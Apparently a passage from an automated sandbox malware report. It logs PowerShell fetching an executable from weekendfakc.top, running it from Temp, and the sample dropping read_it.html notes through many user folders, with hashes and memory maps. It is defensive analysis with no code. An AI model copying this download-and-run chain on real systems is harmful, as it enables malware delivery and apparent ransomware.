Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = 0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine	value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ	2	Fn
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion	value_name = InstallationType, data = Client, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = 0, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = Library, data = netfxperf.dll, type = REG_SZ	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance	value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN	1	Fn
Read Value	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance	value_name = Counter Names, type = REG_BINARY	2	Fn Data
Read Value	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds	value_name = PipelineMaxStackSizeMB, type = REG_NONE	1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Keys	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Enumerate Values	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn
Get Key Info	HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog		1	Fn

Process (2)

Operation	Process	Additional Information	Success	Count	Logfile
Create	C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe	show_window = SW_SHOWNORMAL		1	Fn
Get Info		type = PROCESS_BASIC_INFORMATION		1	Fn

Module (5)

Operation	Additional Information	Count	Logfile
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048	1	Fn
Get Filename	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260	2	Fn
Create Mapping	filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072	1	Fn
Map	process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, desired_access = FILE_MAP_WRITE	1	Fn

System (9)

Operation	Additional Information	Count	Logfile
Get Computer Name	result_out = 6CURNMAPTGWD	1	Fn
Get Info	type = Operating System	6	Fn
Get Info	type = SYSTEM_PROCESS_INFORMATION	1	Fn
Get Info	type = Hardware Information	1	Fn

Mutex (21)

Operation	Additional Information	Count	Logfile
Create	mutex_name = Global\.net clr networking	5	Fn
Release		11	Fn
Release	mutex_name = Global\.net clr networking	5	Fn

Environment (123)

Operation	Additional Information	Count	Logfile
Get Environment String	name = MshEnableTrace	115	Fn
Get Environment String	name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn
Get Environment String	name = HOMEDRIVE, result_out = C:	1	Fn
Get Environment String	name = HOMEPATH, result_out = \Users\YbZ8BTYYvts 7lFSQB0g	1	Fn
Get Environment String	name = HomeDrive, result_out = C:	1	Fn
Get Environment String	name = HomePath, result_out = \Users\YbZ8BTYYvts 7lFSQB0g	1	Fn
Get Environment String	name = temp, result_out = C:\Users\YBZ8BT~1\AppData\Local\Temp	2	Fn
Set Environment String	name = PSMODULEPATH, value = C:\Users\YbZ8BTYYvts 7lFSQB0g\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\	1	Fn

Network Behavior

DNS (1)

Operation	Additional Information	Success	Count	Logfile
Resolve Name	host = weekendfakc.top, address_out = 54.205.205.46		1	Fn

TCP Sessions (1)

Information	Value
Total Data Sent	0.08 KB (78 bytes)
Total Data Received	210.47 KB (215520 bytes)
Contacted Host Count	1
Contacted Hosts	54.205.205.46:80

TCP Session #1

Information	Value
Handle	0x4e0
Address Family	AF_INET
Type	SOCK_STREAM
Protocol	IPPROTO_TCP
Remote Address	54.205.205.46
Remote Port	80
Local Address	0.0.0.0
Local Port	1728
Data Sent	0.08 KB (78 bytes)
Data Received	210.47 KB (215520 bytes)

Operations

Operation	Additional Information	Count	Logfile
Create	protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM	1	Fn
Connect	remote_address = 54.205.205.46, remote_port = 80	1	Fn
Send	flags = NO_FLAG_SET, size = 78, size_out = 78	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 4096, size_out = 4096	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 8972	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3472	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 5240	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 13068	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 4356	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 42108	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 2904	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 31944	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 27588	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65536, size_out = 3472	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 65396, size_out = 6692	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 58704, size_out = 5808	1	Fn Data
Receive	flags = NO_FLAG_SET, size = 52896, size_out = 52896	1	Fn Data
Close	type = SOCK_STREAM	1	Fn

HTTP Sessions (1)

Information	Value
Total Data Sent	0.08 KB (78 bytes)
Total Data Received	210.47 KB (215520 bytes)
Contacted Host Count	1
Contacted Hosts	weekendfakc.top

HTTP Session #1

Information	Value
Server Name	weekendfakc.top
Server Port	80
Data Sent	0.08 KB (78 bytes)
Data Received	210.47 KB (215520 bytes)

Operations

Operation	Additional Information	Count	Logfile
Open Session	access_type = WINHTTP_ACCESS_TYPE_NO_PROXY, proxy_name = WINHTTP_NO_PROXY_NAME, proxy_bypass = WINHTTP_NO_PROXY_BYPASS	1	Fn
Open Connection	protocol = http, server_name = weekendfakc.top, server_port = 80	1	Fn
Open HTTP Request	http_verb = GET, http_version = HTTP/1.1, target_resource = /admin.php?f=2	1	Fn
Send HTTP Request	headers = host: weekendfakc.top, connection: Keep-Alive, url = weekendfakc.top/admin.php?f=2	1	Fn Data
Read Response	size = 4096, size_out = 4096	1	Fn Data
Read Response	size = 65536, size_out = 8972	1	Fn Data
Read Response	size = 65536, size_out = 3472	1	Fn Data
Read Response	size = 65536, size_out = 5240	1	Fn Data
Read Response	size = 65536, size_out = 13068	1	Fn Data
Read Response	size = 65536, size_out = 4356	1	Fn Data
Read Response	size = 65536, size_out = 2904	1	Fn Data
Read Response	size = 65536, size_out = 42108	1	Fn Data
Read Response	size = 65536, size_out = 2904	1	Fn Data
Read Response	size = 65536, size_out = 31944	1	Fn Data
Read Response	size = 65536, size_out = 27588	1	Fn Data
Read Response	size = 65536, size_out = 3472	1	Fn Data
Read Response	size = 65396, size_out = 6692	1	Fn Data
Read Response	size = 58704, size_out = 5808	1	Fn Data
Read Response	size = 52896, size_out = 52896	1	Fn Data
Close Session		1	Fn

Process #3: temp13684.exe

(Host: 2703, Network: 0)

Information	Value
ID	#3
File Name	c:\users\ybz8bt~1\appdata\local\temp13684.exe
Command Line	"C:\Users\YBZ8BT~1\AppData\Local\Temp13684.exe"
Initial Working Directory	C:\Users\YbZ8BTYYvts 7lFSQB0g\Desktop\
Monitor	Start Time: 00:02:03, Reason: Child Process
Unmonitor	End Time: 00:15:23, Reason: Terminated by Timeout
Monitor Duration	00:13:20

OS Process Information

Information	Value
PID	0x868
Parent PID	0xbb0 (c:\windows\system32\windowspowershell\v1.0\powershell.exe)
Is Created or Modified Executable
Integrity Level	Medium
Username	6CURNMAPTGWD\YbZ8BTYYvts 7lFSQB0g
Groups	6CURNMAPTGWD\Domain Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) Everyone (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) BUILTIN\Administrators (USE_FOR_DENY_ONLY) BUILTIN\Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\INTERACTIVE (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) CONSOLE LOGON (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Authenticated Users (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\This Organization (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\Logon Session 00000000:0001069e (MANDATORY, ENABLED_BY_DEFAULT, ENABLED, LOGON_ID) LOCAL (MANDATORY, ENABLED_BY_DEFAULT, ENABLED) NT AUTHORITY\NTLM Authentication (MANDATORY, ENABLED_BY_DEFAULT, ENABLED)
Enabled Privileges	SeChangeNotifyPrivilege
Thread IDs	0x 668

Region

Name	Start VA	End VA	Type	Permissions	Actions
private_0x0000000000010000	0x00010000	0x0002ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000010000	0x00010000	0x0001ffff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000020000	0x00020000	0x00020fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00031fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000030000	0x00030000	0x00030fff	Private Memory	Readable, Writable	Region Actions Download Dump
apisetschema.dll	0x00040000	0x00040fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000000050000	0x00050000	0x0008ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000090000	0x00090000	0x0018ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000190000	0x00190000	0x00193fff	Pagefile Backed Memory	Readable	Region Actions
private_0x00000000001a0000	0x001a0000	0x001a0fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x00000000001b0000	0x001b0000	0x001b0fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x00000000001c0000	0x001c0000	0x001d0fff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000001e0000	0x001e0000	0x0025ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000000260000	0x00260000	0x0026ffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000260000	0x00260000	0x00266fff	Pagefile Backed Memory	Readable, Writable	Region Actions
pagefile_0x0000000000270000	0x00270000	0x00276fff	Pagefile Backed Memory	Readable, Writable	Region Actions
private_0x0000000000290000	0x00290000	0x0029ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x00000000002a0000	0x002a0000	0x0039ffff	Private Memory	Readable, Writable	Region Actions Download Dump
rsaenh.dll	0x003a0000	0x003dbfff	Memory Mapped File	Readable	Region Actions
rsaenh.dll	0x003a0000	0x003dbfff	Memory Mapped File	Readable	Region Actions
temp13684.exe	0x00400000	0x00435fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
locale.nls	0x00440000	0x004a6fff	Memory Mapped File	Readable	Region Actions
private_0x00000000005f0000	0x005f0000	0x005fffff	Private Memory	Readable, Writable	Region Actions Download Dump
pagefile_0x0000000000600000	0x00600000	0x00787fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000790000	0x00790000	0x00910fff	Pagefile Backed Memory	Readable	Region Actions
pagefile_0x0000000000920000	0x00920000	0x01d1ffff	Pagefile Backed Memory	Readable	Region Actions
sortdefault.nls	0x01d20000	0x01feefff	Memory Mapped File	Readable	Region Actions
private_0x0000000002170000	0x02170000	0x0217ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002310000	0x02310000	0x0231ffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x0000000002320000	0x02320000	0x0331ffff	Private Memory	Readable, Writable	Region Actions
wow64win.dll	0x73ea0000	0x73efbfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64.dll	0x73f00000	0x73f3efff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wow64cpu.dll	0x73f70000	0x73f77fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
mprapi.dll	0x74c40000	0x74c68fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
regapi.dll	0x74f70000	0x74f84fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
atl.dll	0x74f90000	0x74fa3fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
certcli.dll	0x74fb0000	0x75005fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rsaenh.dll	0x75070000	0x750aafff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptsp.dll	0x750b0000	0x750c5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
cryptbase.dll	0x754e0000	0x754ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sspicli.dll	0x754f0000	0x7554ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
usp10.dll	0x755e0000	0x7567cfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
user32.dll	0x75880000	0x7597ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
lpk.dll	0x75a50000	0x75a59fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
wldap32.dll	0x75a60000	0x75aa4fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
advapi32.dll	0x75b10000	0x75baffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ole32.dll	0x75d50000	0x75eabfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernel32.dll	0x75eb0000	0x75fbffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
crypt32.dll	0x75fc0000	0x760dcfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
rpcrt4.dll	0x761a0000	0x7628ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
gdi32.dll	0x76290000	0x7631ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msctf.dll	0x76320000	0x763ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
kernelbase.dll	0x76460000	0x764a5fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
shlwapi.dll	0x765b0000	0x76606fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msvcrt.dll	0x76640000	0x766ebfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
imm32.dll	0x76830000	0x7688ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
sechost.dll	0x774e0000	0x774f8fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
private_0x0000000077590000	0x77590000	0x77689fff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
private_0x0000000077690000	0x77690000	0x777aefff	Private Memory	Readable, Writable, Executable	Region Actions Download Dump
ntdll.dll	0x777b0000	0x77958fff	Memory Mapped File	Readable, Writable, Executable	Region Actions
msasn1.dll	0x77960000	0x7796bfff	Memory Mapped File	Readable, Writable, Executable	Region Actions
ntdll.dll	0x77990000	0x77b0ffff	Memory Mapped File	Readable, Writable, Executable	Region Actions
pagefile_0x000000007efb0000	0x7efb0000	0x7efd2fff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007efdb000	0x7efdb000	0x7efddfff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efde000	0x7efde000	0x7efdefff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efdf000	0x7efdf000	0x7efdffff	Private Memory	Readable, Writable	Region Actions Download Dump
private_0x000000007efe0000	0x7efe0000	0x7ffdffff	Private Memory	Readable	Region Actions
pagefile_0x000000007efe0000	0x7efe0000	0x7f0dffff	Pagefile Backed Memory	Readable	Region Actions
private_0x000000007f0e0000	0x7f0e0000	0x7ffdffff	Private Memory	Readable	Region Actions
private_0x000000007ffe0000	0x7ffe0000	0x7ffeffff	Private Memory	Readable	Region Actions Download Dump
private_0x000000007fff0000	0x7fff0000	0x7fffffeffff	Private Memory	Readable	Region Actions

Created Files

Filename	File Size	Hash Values	Actions
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe	210.14 KB (215184 bytes)	MD5: 8f74824751359ce6359876e422c1f8c1 SHA1: 86ec6897a9efbe17cefae3ebe8062a3153bccd6d SHA256: a5aac8cb7ed1e315f16975522723605b3cf27c8676f000be3d65ad6a56daf014	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\appdata\roaming\temp13684.exe	0.00 KB (0 bytes)	MD5: d41d8cd98f00b204e9800998ecf8427e SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855	File Actions Show Properties
c:\users\public\{846ee340-7039-11de-9d20-806e6f6e6963}	1.00 KB (1026 bytes)	MD5: 755f5c8f81c8cd181f27d7b5dbcd37f7 SHA1: 619f68e3ee28c77522018ed6af5c877130464020 SHA256: fae73bded7d5ab96ea321b7a17a31d5816ae67bbbc8c37c3e370a1ef44242d1c	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\ntuser.ini.4035	0.95 KB (976 bytes)	MD5: a69d1ce732f370c4e3dbdc4b92a09694 SHA1: ebe2275af3897092841d1199e5ac4f742563166c SHA256: 7258116174418acc346e6423bef9ab0de57c0ab329d22b7b867e07cfd9ab1e12	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\x8k-tb9nsgqij6\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\videos\a0ewjzo0h70q\urnkmksgaz1mrc-kzew\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\searches\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\saved games\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\pictures\w7s1sef\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\music\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\music\poibg_ey7m-ncykd\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\links\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\favorites\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\favorites\windows live\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
c:\users\ybz8btyyvts 7lfsqb0g\favorites\msn websites\read_it.html	4.78 KB (4898 bytes)	MD5: b3713b894a8d7f366299a3d0a3449485 SHA1: fbf640c02b23268c2b3a684b4455f904363fe22a SHA256: f812c424c85c13c608b58172be19f143071391ccfb843dee2b9bf11020168325	File Actions Show Properties Download
